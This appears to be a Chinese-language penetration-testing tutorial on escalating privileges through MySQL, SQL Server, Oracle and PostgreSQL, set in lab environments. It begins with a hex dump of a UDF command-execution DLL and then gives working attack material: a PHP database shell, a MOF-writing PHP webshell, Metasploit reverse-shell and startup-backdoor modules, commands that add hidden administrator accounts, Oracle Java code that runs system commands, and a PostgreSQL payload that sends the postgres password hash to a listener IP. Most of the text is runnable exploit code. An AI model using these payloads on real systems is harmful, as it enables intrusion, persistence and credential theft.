D3225000000750AB901000000E826030000FF15D0140000BA090400C0488BC8FF15CA1400004881C488000000C3CCCC488D0DD9290000E90203000040534883EC20488BD9488B0DEC290000FF15CE14000048894424384883F8FF750B488BCBFF15EA140000EB7EB908000000E8DE02000090488B0DBE290000FF15A01400004889442438488B0DA4290000FF158E1400004889442440488BCBFF15D8140000488BC84C8D442440488D542438E898020000488BD8488B4C2438FF15B814000048890571290000488B4C2440FF15A614000048890557290000B908000000E861020000488BC34883C4205BC34883EC28E847FFFFFF48F7D81BC0F7D8FFC84883C428C3CC48895C2408574883EC20488D1D03160000488D3DFC150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC348895C2408574883EC20488D1DDB150000488D3DD4150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC3CCCCCCCCCCCCCCCCCCCCCCCC488BC1B94D5A0000663908740333C0C34863483C4803C833C0813950450000750CBA0B020000663951180F94C0F3C3CC4C63413C4533C94C8BD24C03C1410FB74014450FB758064A8D4C00184585DB741E8B510C4C3BD2720A8B410803C24C3BD0720F41FFC14883C128453BCB72E233C0C3488BC1C3CCCCCCCCCCCCCCCCCCCC4883EC284C8BC14C8D0D62E2FFFF498BC9E86AFFFFFF85C074224D2BC1498BD0498BC9E888FFFFFF4885C0740F8B4024C1E81FF7D083E001EB0233C04883C428C3CCFF2520130000FF2512130000FF25BC120000FF25BE120000FF25681300004883EC2883FA01751048833D97130000007506FF1537120000B8010000004883C428C3CC48895C2418574883EC20488B05DB21000048836424300048BF32A2DF2D992B0000483BC7740C48F7D0488905C4210000EB76488D4C2430FF153F120000488B5C2430FF15C4110000448BD84933DBFF15C0110000448BD84933DBFF15BC110000488D4C2438448BD84933DBFF15B31100004C8B5C24384C33DB48B8FFFFFFFFFFFF00004C23D848B833A2DF2D992B00004C3BDF4C0F44D84C891D4E21000049F7D34C891D4C210000488B5C24404883C4205FC3CCFF25EA110000FF25EC110000FF25EE110000FF25F0110000FF25F2110000FF256C110000FF255E110000CCCC40534883EC20458B18488BDA4C8BC94183E3F841F600044C8BD17413418B40084D635004F7D84C03D14863C84C23D14963C34A8B1410488B43108B480848034B08F641030F740C0FB6410383E0F048984C03C84C33CA498BC94883C4205BE9C9F6FFFFCC4883EC284D8B4138488BCA498BD1E889FFFFFFB8010000004883C428C3CCFF25E4110000CCCCCCCC40554883EC20488BEA488BD148894D28488B018B08894D24E84DFEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEAC7054D200000FFFFFFFF4883C4205DC340554883EC20488BEAB908000000E8F8FEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEA488B0133C98138050000C00F94C18BC18BC14883C4205DC3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F43800000000000000000000000000000000000000000000000000000000000000000000000000004016008001000000000000000000000000000000000000003040008001000000D0400080010000004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279000000720000000000000000000000000000000000000000000000000000000000000000000000011D0C001DC40B001D740A001D5409001D3408001D3219F017E015D01915080015740A001564090015340800155211C0E41D00000200000027190000091A0000801F0000091A0000211900000F1A0000B01F000000000000010F06000F6407000F3406000F320B70010C02000C01110001060200063202501106020006320230E41D000001000000031C0000691C0000C91F0000000000000904010004420000E41D000001000000971D0000CA1D0000F01F0000CA1D00000104010004420000010A04000A3408000A3206700904010004420000E41D000001000000E4150000EB15000001000000EB150000010F06000F640A000F3408000F520B7021000000E01300000F14000004340000210000000F14000058140000F03300002108020008348C000F14000058140000F03300002108020008548E00E01300000F14000004340000192207001001860009E007D005C0037002600000581F000020040000010A04000A3406000A32067001310400317406000632023001060200063202308034000000000000000000004036000000300000203500000000000000000000A4360000A0300000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F4380000000000000000000000000000680457616974466F7253696E676C654F626A6563740058045669727475616C416C6C6F630000D503536574456E7669726F6E6D656E745661726961626C654100A30043726561746554687265616400004B45524E454C33322E646C6C0000AC04667265650000E7025F70636C6F736500E5046D616C6C6F630000EB025F706F70656E00003B0573797374656D00002B057374726E637079009B0466676574730006057265616C6C6F6300BC04676574656E7600004D5356435239302E646C6C0037015F656E636F64655F706F696E746572004E025F6D616C6C6F635F63727400CE015F696E69747465726D00CF015F696E69747465726D5F650038015F656E636F6465645F6E756C6C002D015F6465636F64655F706F696E74657200E2005F616D73675F65786974000059005F5F435F73706563696669635F68616E646C657200005A005F5F4370705863707446696C7465720083005F5F6372745F64656275676765725F686F6F6B007B005F5F636C65616E5F747970655F696E666F5F6E616D65735F696E7465726E616C0000A4035F756E6C6F636B0085005F5F646C6C6F6E65786974003D025F6C6F636B00E4025F6F6E65786974002504536C6565700031045465726D696E61746550726F636573730000AA0147657443757272656E7450726F63657373004204556E68616E646C6564457863657074696F6E46696C74657200001904536574556E68616E646C6564457863657074696F6E46696C74657200CB024973446562756767657250726573656E7400970352746C5669727475616C556E77696E640000900352746C4C6F6F6B757046756E6374696F6E456E7472790000890352746C43617074757265436F6E7465787400CC0044697361626C655468726561644C69627261727943616C6C73004E035175657279506572666F726D616E6365436F756E7465720066024765745469636B436F756E740000AE0147657443757272656E7454687265616449640000AB0147657443757272656E7450726F636573734964004F0247657453797374656D54696D65417346696C6554696D6500F0046D656D637079000000000000000070B1834B00000000DC3900000100000012000000120000002839000070390000B8390000601000003015000000100000401500003015000020150000E01300003015000050130000C013000030150000501300002011000030150000B0100000D0120000B012000080110000F1390000073A0000243A00003F3A00004B3A00005E3A00006F3A0000783A0000883A0000963A00009F3A0000AF3A0000BD3A0000C53A0000D43A0000E13A0000E93A0000F83A000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E697400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032A2DF2D992B0000CD5D20D266D4FFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020110000721100002C34000080110000AC12000020340000B0120000C812000078330000D01200004E13000018330000C0130000D813000078330000E01300000F140000043400000F14000058140000F033000058140000BE140000DC330000BE140000D4140000CC330000D41400001B150000BC33000040150000D7150000AC330000E0150000F21500008C330000401600009E16000038340000A0160000F9180000C0320000FC180000311A0000DC320000341A0000711A000018330000741A0000BE1B000028330000CC1B00007C1C0000383300007C1C0000931C000078330000941C0000CC1C000020340000CC1C0000041D000020340000901D0000D11D000058330000F01D0000131E000078330000141E0000C71E000080330000F41E0000571F000038340000581F0000751F000078330000801F0000A31F000030330000B01F0000C91F000030330000C91F0000E21F000030330000F01F0000112000003033000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005860000058020000E4040000000000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E47003000001000000088A1A0A1A8A1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";}?>

        2. 以下是要过本地限制连接mysql数据库显示并执行的php代码:

          <?php
$host = 'localhost';
$username = 'root';
$password = '123456'; // 注意:出于安全考虑,避免在代码中明文存储密码
$conn = new mysqli($host, $username, $password);if ($conn->connect_error) {die("连接失败: " . $conn->connect_error);
}
$conn->set_charset("utf8mb4");$response = [];if ($_SERVER["REQUEST_METHOD"] === "POST") {$action = $_POST['action'];$database = $_POST['database'];if ($database) {$conn->select_db($database);}switch ($action) {case 'getTables':$sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = '$database'";$result = $conn->query($sql);while ($row = $result->fetch_assoc()) {$response[] = $row['table_name'];}break;case 'getColumns':$table = $_POST['table'];$sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = '$database' AND table_name = '$table'";$result = $conn->query($sql);while ($row = $result->fetch_assoc()) {$response[] = $row['column_name'];}break;case 'getRows':$table = $_POST['table'];$column = $_POST['column'];$sql = "SELECT `$column` FROM `$table`";$result = $conn->query($sql);while ($row = $result->fetch_assoc()) {$response[] = $row[$column];}break;case 'executeSQL':$sql = $_POST['sql'];$result = $conn->query($sql);if ($result === true) {$response['success'] = "执行成功";} else if ($result) {while ($row = $result->fetch_assoc()) {$response[] = $row;}} else {$response['error'] = "错误: " . $conn->error;}break;}$conn->close();echo json_encode($response);exit;
}$databases = [];
$result = $conn->query("SHOW DATABASES");
while ($row = $result->fetch_assoc()) {$databases[] = $row['Database'];
}
$conn->close();
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>CongSec</title>
<style>body { font-family: Arial, sans-serif; }.container {display: flex;flex-wrap: wrap;  /* 允许子项在必要时换行 */align-items: center; /* 中心对齐子项 */padding: 10px;}button {margin: 5px;padding: 8px 16px;background-color: #4CAF50;color: white;border: none;border-radius: 4px;cursor: pointer;min-width: 120px; /* 最小宽度 */white-space: nowrap; /* 防止文字在按钮内换行 */}button:hover {background-color: #45a049;}div {margin: 5px;}textarea {width: 95%; /* 调整宽度以适应屏幕 */height: 150px; /* 调整高度 */margin: 5px;}
</style>
<script>
function fetchTables(database) {fetch('', {method: 'POST',headers: {'Content-Type': 'application/x-www-form-urlencoded',},body: 'action=getTables&database=' + encodeURIComponent(database)}).then(response => response.json()).then(data => {const container = document.getElementById('tables');container.innerHTML = '';data.forEach(table => {const div = document.createElement('div');const button = document.createElement('button');button.textContent = table;button.onclick = () => fetchColumns(database, table);div.appendChild(button);container.appendChild(div);});});
}function fetchColumns(database, table) {fetch('', {method: 'POST',headers: {'Content-Type': 'application/x-www-form-urlencoded',},body: 'action=getColumns&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table)}).then(response => response.json()).then(data => {const container = document.getElementById('columns');container.innerHTML = '';data.forEach(column => {const div = document.createElement('div');const button = document.createElement('button');button.textContent = column;button.onclick = () => fetchRows(database, table, column);div.appendChild(button);container.appendChild(div);});});
}function fetchRows(database, table, column) {fetch('', {method: 'POST',headers: {'Content-Type': 'application/x-www-form-urlencoded',},body: 'action=getRows&database=' + encodeURIComponent(database) + '&table=' + encodeURIComponent(table) + '&column=' + encodeURIComponent(column)}).then(response => response.json()).then(data => {const container = document.getElementById('rows');container.innerHTML = '';data.forEach(value => {const div = document.createElement('div');div.textContent = value;container.appendChild(div);});});
}function executeSQL() {const sql = document.getElementById('sqlText').value;fetch('', {method: 'POST',headers: {'Content-Type': 'application/x-www-form-urlencoded',},body: 'action=executeSQL&sql=' + encodeURIComponent(sql)}).then(response => response.json()).then(data => {const container = document.getElementById('sqlResult');container.innerHTML = '';if (data.error) {container.textContent = data.error;} else if (data.success) {container.textContent = data.success;} else {data.forEach(row => {const div = document.createElement('div');div.textContent = JSON.stringify(row);container.appendChild(div);});}});
}
</script>
</head>
<body>
<h1>选择数据库</h1>
<div class="container" id="databases">
<?php foreach ($databases as $db): ?><button onclick="fetchTables('<?php echo $db; ?>')"><?php echo $db; ?></button>
<?php endforeach; ?>
</div>
<h2>表信息</h2>
<div class="container" id="tables"></div>
<h2>列信息</h2>
<div class="container" id="columns"></div>
<h2>字段信息</h2>
<div class="container" id="rows"></div>
<h2>执行SQL</h2>
<div class="container" id="executeSQL"><textarea id="sqlText"></textarea><button onclick="executeSQL()">执行</button>
</div>
<h2>SQL执行结果</h2>
<div class="container" id="sqlResult"></div>
</body>
</html>

        3. 访问该脚本,输入数据库的账号和密码

          1. image

        4. 点击导出可以在目标主机的脚本提示目录中发现有udf.dll文件生成

          1. image
          2. image

        5. 将dll文件绑定sys_eval函数

          1. image

        6. 使用select cmdshell('whoami')命令可以看到是系统管理员身份

          1. image

      2. 只有数据库权限

        1. 条件

          1. 数据库外联开启

          2. secure-file-priv没进行目录限制

            1. image

          3. 具有数据库帐号密码

        2. 复现

          1. 靶场:php 5.4.45 apche 2.4.23 iis win2008 mysql 5.5.53

          2. 首先我们要创建一个模拟可以外联的sql数据库来模拟攻击者已经获取了一个普通用户的数据库,以下是开启外联的步骤

            1. 在mysql数据库中主机为%即为容许所有主机来连接

              1. image

              2. 成功连接

                1. image
          3. msf工具

            1. udf生成的文件路径:

              1. mysql5.2导出目录c:/windows或system32

              2. mysql=5.2导出安装目录/lib/plugin/

                1. image

              3. 安装目录

                1. image

            2. 通过msf工具生成eqoWcBgh.dll文件

              1.  use exploit/multi/mysql/mysql_udf_payloadset payload windows/meterpreter/reverse_tcp set password rootset  rhosts 192.168.72.139run
              2. image

            3. 创建函数绑定dll

              1. image

            4. 可以执行任意命令,拿下webshell

              1. image

            5. 利用msf执行以下命令来创建启动项开机自启后门

              1.  use exploit/windows/mysql/mysql_start_up set rhosts 192.168.72.139set username rootset password root run
              2. image
          4. sql语句提权

            1. 在数据库中执行一下脚本即可拿到system权限

              1. image

    2. MOF提权

      1. 前言
        1. mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。【MOF提权只能用于Windows系统提权,Linux提权无法使用】
        2. xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。
      2. 条件
        1. mysql有读写 C:/Windows/system32/wbem/mof 的权限
        2. secure-file-priv参数不为null
        3. 适用于win2003更早的版本
      3. 复现
        1. msf工具

          1. 使用msf工具来提权即可

            1.  use exploit/windows/mysql/mysql_mof# 设置payloadset payload windows/meterpreter/reverse_tcp# 设置目标 MySQL 的基础信息set rhosts 192.168.72.139set username rootset password rootrun
        2. php脚本提权

          1. 将脚本通过文件上传到可访问路径并用数据库账号和密码进行连接即可

            1. image

            2. 提权脚本:

              1.  <?php $path="c:/ini.txt"; session_start(); if(!empty($_POST['submit'])){ setcookie("connect"); setcookie("connect[host]",$_POST['host']); setcookie("connect[user]",$_POST['user']); setcookie("connect[pass]",$_POST['pass']); setcookie("connect[dbname]",$_POST['dbname']); echo "<script>location.href='?action=connect'</script>"; } if(empty($_GET["action"])){ ?> <html> <head><title>Win MOF Shell</title></head> <body> <form action="?action=connect" method="post"> Host: <input type="text" name="host" value="127.0.0.1"><br/> User: <input type="text" name="user" value="root"><br/> Pass: <input type="password" name="pass" value="root"><br/> DB:   <input type="text" name="dbname" value="mysql"><br/> <input type="submit" name="submit" value="Submit"><br/> </form> </body> </html> <?php exit; } if ($_GET[action]=='connect') { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>"; echo "Cmd:"; echo "<input type='text' name='cmd' value='$strCmd'?>"; echo "<br>"; echo "<br>"; echo "<input type='submit' value='Exploit'>"; echo "</form>"; echo "<form action='' method='post'>"; echo "<input type='hidden' name='flag' value='flag'>"; echo "<input type='submit'value=' Read  '>"; echo "</form>"; if (isset($_POST['cmd'])){ $strCmd=$_POST['cmd']; $cmdshell='cmd /c '.$strCmd.'>'.$path; $mofname="c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") instance of __EventFilter as \$EventFilter { EventNamespace = \"Root\\\\\\\\Cimv2\"; Name  = \"filtP2\"; Query = \"Select * From __InstanceModificationEvent \" \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" \"And TargetInstance.Second = 5\"; QueryLanguage = \"WQL\"; }; instance of ActiveScriptEventConsumer as \$Consumer { Name = \"consPCSV2\"; ScriptingEngine = \"JScript\"; ScriptText = \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; }; instance of __FilterToConsumerBinding { Consumer = \$Consumer; Filter = \$EventFilter; };"; mysql_select_db($_COOKIE["connect"]["dbname"],$conn); $sql1="select '$payload' into dumpfile '$mofname';"; if(mysql_query($sql1)) echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); mysql_close($conn); } if(isset($_POST['flag'])) { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); $sql2="select load_file(\"".$path."\");"; $result2=mysql_query($sql2); $num=mysql_num_rows($result2); while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { echo "<hr/>"; echo '<pre>'. $row[0].'</pre>'; } mysql_close($conn); } } ?>

          2. 连接上即可执行任意命令

            1. image

          3. 接下来就进行权限的维持

            1. 创建隐藏用户net user cong$ 12456 /add & net localgroup administrators cong$ /add
            2. image

    3. sqlserver提权

      1. 前言

        1. 在SQL Server中,如果攻击者能够获取到sa(系统管理员)账户的密码,那么他们实际上已经拥有了非常高的权限,因为sa账户是SQL Server中的超级用户,具有对数据库服务器的完全控制权。

        2. 关于执行操作系统命令的权限,特别是通过SQL Server的 xp_cmdshell或其他机制,这取决于SQL Server的配置以及运行SQL Server的 Windows操作系统账户的安全设置。

        3. 敏感文件名称

          1.  web.config config.asp conn.aspx database.aspx

      2. 条件

        1. 服务器开启数据库服务
        2. 获取到最高权限用户密码
          (除Access数据库外,其他数据库基本都存在数据库提权的可能)

      3. xp_cmdshell提权

        1. 复现

          1. 通过连接数据库执行数据库语句

            1. 开启xp_cmdshell命令

              1.  EXEC sp_configure 'show advanced options', 1RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

            2. 执行命令语句EXEC master.dbo.xp_cmdshell 'whoami'即可

      4. 沙盒提权

        1. 介绍

          1. 沙盒模式是数据库的一种安全功能。在沙盒模式下,只对控件和字段属性中的安全且不含恶意代码的表达式求值。如果表达式不使用可能以某种方式损坏数据的函数或属性,则可认为它是安全的。利用前提需要sqlserver sysadmin账户服务器权限为system(sqlserver2019默认被降权为mssql),服务器拥有 jet.oledb.4.0 驱动。

          2. 局限:(1)Microsoft.jet.oledb.4.0一般在32位操作系统上才可以 (2)Windows 2008以上 默认无 Access 数据库文件, 需要自己上传 sqlserver2015默认禁用Ad Hoc Distributed Queries,需要开启。

          3. 沙盒模式SandBoxMode参数含义(默认是2)

            0:在任何所有者中禁止启用安全模式

            1 :为仅在允许范围内

            2 :必须在access模式下

            3:完全开启

        2. 复现

          1. 执行以下两条命令,启用高级选项

            1.  exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;

          2. 修改注册表

            1. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

          3. 使用 SQL Server 的扩展存储过程 xp_regread 来从 Windows 注册表中读取 SandBoxMode 键的值。

            1. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode';

          4. 执行系统命令

            1.  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user qianxun 123456 /add")')select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators qianxun /add")')

          5. 恢复配置

            1.  exec master..xp_regwrite 'HKEY_LOCALMACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;exec sp_configure 'show advanced options',0;reconfigure;

Oracle提权

  1. 靶场搭建

    1. 准备一个oracle环境的靶场

    2. 进入数据库sqlplus/nolog

    3. 连接数据库用户conn/as sysdba

    4. 创建一个低权限用户create user test identified by test;

      1. image

    5. 还有获得有java权限

      1.  DECLAREPOL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT', 'ZTZ', 'SYS', 'java.io.FilePermission', '<<ALLFILES>>', 'execute', 'ENABLED' FROM DUAL;BEGINOPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;/

    6. 如果想要执行任意代码的话还需要额外获得java.lang.RuntimePermission权限

      1.  DECLAREPOL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission','writeFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;BEGINOPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;/DECLAREPOL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission','readFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;BEGINOPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;/

  2. 执行任意命令

    1. 复现

      1. 创建java包

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

      2. 获取java权限

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<all>'''',''''EXECUTE'''');end;''commit;end;') from dual;

      3. 创建执行命令函数

        1.  select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

      4. 执行命令select LinxRUNCMD('whoami') from dual;

  3. 通过注入存储过程提权(低权限提升至DBA)

    1. 原理
      1. SYS创建的存储过程存在sql注入。拥有create procedure权限的用户通过创建提权函数,将提权函数注入到存储过程中,于是该存储过程将调用这个提权函数来执行grant dba to quan命令,获得Oracle数据库dba权限
    2. 利用条件
      1. SYS创建的存储过程存在sql注入(EG:CVE-2005-4832)
      2. 用户拥有create procedure权限(用来创建函数)
    3. 复现

      1. 创建一个java class然后用procedure包装进行调用

        1.  create or replace and resolve java source named JAVACMD asimport java.lang.*;import java.io.*;public class JAVACMD{public static void execmd(String command) throws IOException{Runtime.getRuntime().exec(command);}}/

      2. 创建调用的包

        1.  create or replace procedure MYJAVACMD(command in varchar) as language javaname 'JAVACMD.execmd(java.lang.String)';/

      3. 执行命令

        1.  EXEC MYJAVACMD('net user cong cong /add');

      4. image

PostgreSQl提权

  1. 介绍

    1. PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。

  2. 复现

    1. 创建函数提权

      1. 介绍

        1. PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作

      2. 靶场:vulhub postgres/CVE-2018-1058

      3. 用普通用户连接数据库,psql --host 192.168.72.130 --username vulhub(vulhub/vulhub)

      4. 执行以下语句即可(注意更换监听ip与端口)

        1.  CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$select dblink_connect((select 'hostaddr=192.168.1.7 port=1234 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); SELECT pg_catalog.array_to_string($1,$2);$$ LANGUAGE SQL VOLATILE;

